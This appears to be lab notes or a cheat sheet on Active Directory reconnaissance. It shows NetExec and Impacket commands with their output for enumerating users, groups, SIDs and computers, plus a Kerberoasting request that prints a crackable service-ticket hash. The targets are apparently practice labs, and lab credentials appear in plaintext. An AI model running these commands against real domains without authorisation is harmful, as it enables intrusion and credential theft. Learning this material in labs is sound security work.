LDAP Attacks (Port 389)
NetExec: LDAP Enumeration
Enumerate LDAP information on the target Windows system. This can be done using tools like nxc to query LDAP services for directory information.
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --users
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL [*] Enumerated 16 domain users: north.sevenkingdoms.local
LDAP 10.10.10.11 389 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.10.11 389 WINTERFELL Administrator 2025-10-18 18:41:56 0 Built-in account for administering the computer/domain
LDAP 10.10.10.11 389 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.10.11 389 WINTERFELL vagrant 2021-05-12 11:39:16 0 Vagrant User
LDAP 10.10.10.11 389 WINTERFELL krbtgt 2025-10-18 19:07:40 0 Key Distribution Center Service Account
LDAP 10.10.10.11 389 WINTERFELL arya.stark 2025-10-31 23:47:19 0 Arya Stark
LDAP 10.10.10.11 389 WINTERFELL eddard.stark 2025-10-31 23:47:22 0 Eddard Stark
LDAP 10.10.10.11 389 WINTERFELL catelyn.stark 2025-10-31 23:47:24 0 Catelyn Stark
LDAP 10.10.10.11 389 WINTERFELL robb.stark 2025-10-31 23:47:26 0 Robb Stark
LDAP 10.10.10.11 389 WINTERFELL sansa.stark 2025-10-31 23:47:28 0 Sansa Stark
LDAP 10.10.10.11 389 WINTERFELL brandon.stark 2025-10-31 23:47:31 0 Brandon Stark
LDAP 10.10.10.11 389 WINTERFELL rickon.stark 2025-10-31 23:47:33 0 Rickon Stark
LDAP 10.10.10.11 389 WINTERFELL hodor 2025-10-31 23:47:35 0 Brainless Giant
LDAP 10.10.10.11 389 WINTERFELL jon.snow 2025-10-31 23:47:37 0 Jon Snow
LDAP 10.10.10.11 389 WINTERFELL samwell.tarly 2025-10-31 23:47:39 0 Samwell Tarly (Password : Heartsbane)
LDAP 10.10.10.11 389 WINTERFELL jeor.mormont 2025-10-31 23:47:41 0 Jeor Mormont
LDAP 10.10.10.11 389 WINTERFELL sql_svc 2025-10-31 23:47:43 0 sql service
Group Enumeration¶
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --groups
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL Administrators
LDAP 10.10.10.11 389 WINTERFELL Users
LDAP 10.10.10.11 389 WINTERFELL Guests
LDAP 10.10.10.11 389 WINTERFELL Print Operators
LDAP 10.10.10.11 389 WINTERFELL Backup Operators
LDAP 10.10.10.11 389 WINTERFELL Replicator
LDAP 10.10.10.11 389 WINTERFELL Remote Desktop Users
LDAP 10.10.10.11 389 WINTERFELL Network Configuration Operators
LDAP 10.10.10.11 389 WINTERFELL Performance Monitor Users
LDAP 10.10.10.11 389 WINTERFELL Performance Log Users
LDAP 10.10.10.11 389 WINTERFELL Distributed COM Users
LDAP 10.10.10.11 389 WINTERFELL IIS_IUSRS
LDAP 10.10.10.11 389 WINTERFELL Cryptographic Operators
LDAP 10.10.10.11 389 WINTERFELL Event Log Readers
LDAP 10.10.10.11 389 WINTERFELL Certificate Service DCOM Access
LDAP 10.10.10.11 389 WINTERFELL RDS Remote Access Servers
<< SNIP FOR BREVITY >>
impacket: Get Users SPN
Get Users SPN (Service Principal Name)¶
impacket-GetUserSPNs -request -dc-ip 10.1.142.44 buildingmagic.local/r.widdleton
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------------- --------- -------- -------------------------- -------------------------- ----------
HOGWARTS-DC/r.hagrid.WIZARDING.THM:60111 r.haggard 2025-05-15 17:09:04.002067 2025-05-15 18:34:51 644710
[-] CCache file is not found. Skipping...
$krb5tgs$23$*r.haggard$BUILDINGMAGIC.LOCAL$buildingmagic.local/r.haggard*$59f4f0560a3b4f0fb0d6ce6a273a11e8$fc76d13822ff9de3b10695216b3e94f7d85d9aa2aa27e7ade5927727986e735f9bd593743f8d22c71c6d28b7213ee41e5dc3e29fe462ae413c4960a3ecda6a6d33b944e76690037c1205e3d97264dfe26c7d0856e9c5e8ae74a46bdc94cf6bcfe2bd76d01f5ca0da808d026252fd8fda09550d34eb6cb
<< SNIP FOR BREVITY>>
Impacket: Look up SID
Look up SID¶
impacket-lookupsid north.sevenkingdoms.local/samwell.tarly:Heartsbane@10.10.10.11
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.10.10.11
[*] StringBinding ncacn_np:10.10.10.11[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-928725054-1381016483-1750705438
500: NORTH\Administrator (SidTypeUser)
501: NORTH\Guest (SidTypeUser)
502: NORTH\krbtgt (SidTypeUser)
<< SNIP FOR BREVITY>>
1000: NORTH\vagrant (SidTypeUser)
1001: NORTH\WINTERFELL$ (SidTypeUser)
1102: NORTH\DnsAdmins (SidTypeAlias)
1103: NORTH\DnsUpdateProxy (SidTypeGroup)
1104: NORTH\SEVENKINGDOMS$ (SidTypeUser)
1105: NORTH\CASTELBLACK$ (SidTypeUser)
1106: NORTH\Stark (SidTypeGroup)
1107: NORTH\Night Watch (SidTypeGroup)
1108: NORTH\Mormont (SidTypeGroup)
1109: NORTH\AcrossTheSea (SidTypeAlias)
1110: NORTH\arya.stark (SidTypeUser)
1111: NORTH\eddard.stark (SidTypeUser)
1112: NORTH\catelyn.stark (SidTypeUser)
1113: NORTH\robb.stark (SidTypeUser)
1114: NORTH\sansa.stark (SidTypeUser)
1115: NORTH\brandon.stark (SidTypeUser)
1116: NORTH\rickon.stark (SidTypeUser)
1117: NORTH\hodor (SidTypeUser)
1118: NORTH\jon.snow (SidTypeUser)
1119: NORTH\samwell.tarly (SidTypeUser)
1120: NORTH\jeor.mormont (SidTypeUser)
1121: NORTH\sql_svc (SidTypeUser)
Impacket: Get AD Users
Impacket’s GetADUsers tool is used to query Active Directory users. It works by using credentials and performing an LDAP query to get information about users within the AD environment.
impacket-GetADUsers -all -dc-ip 10.10.10.11 'north.sevenkingdoms.local'/samwell.tarly:Heartsbane
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Querying 10.10.10.11 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------- ------------------- -------------------
Administrator 2025-10-18 14:41:56.846264 2025-12-05 13:05:45.806754
Guest <never> <never>
vagrant 2021-05-12 07:39:16.765445 2025-10-31 20:07:24.355437
krbtgt 2025-10-18 15:07:40.379595 <never>
2025-11-22 23:06:06.718454 <never>
arya.stark 2025-10-31 19:47:19.581387 2025-11-25 21:21:28.987203
eddard.stark 2025-10-31 19:47:22.283782 2025-12-12 18:12:12.634291
catelyn.stark 2025-10-31 19:47:24.517764 <never>
robb.stark 2025-10-31 19:47:26.751693 2025-12-12 18:13:22.045271
sansa.stark 2025-10-31 19:47:28.970073 <never>
brandon.stark 2025-10-31 19:47:31.063463 2025-12-11 22:12:31.235346
rickon.stark 2025-10-31 19:47:33.140457 <never>
hodor 2025-10-31 19:47:35.218876 <never>
jon.snow 2025-10-31 19:47:37.296408 <never>
samwell.tarly 2025-10-31 19:47:39.405180 <never>
jeor.mormont 2025-10-31 19:47:41.468693 <never>
sql_svc 2025-10-31 19:47:43.438914 2025-12-12 17:42:31.537152
Impacket Get AD Computers
Lists all computer objects in the domain.
impacket-GetADComputers -dc-ip 10.10.10.11 'north.sevenkingdoms.local'/samwell.tarly:Heartsbane
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Querying 10.10.10.11 for information about domain.
SAM AcctName DNS Hostname OS Version OS
--------------- ----------------------------------- --------------- --------------------
WINTERFELL$ winterfell.north.sevenkingdoms.local 10.0 (17763) Windows Server 2019 Datacenter Evaluation
CASTELBLACK$ castelblack.north.sevenkingdoms.local 10.0 (17763) Windows Server 2019 Datacenter Evaluation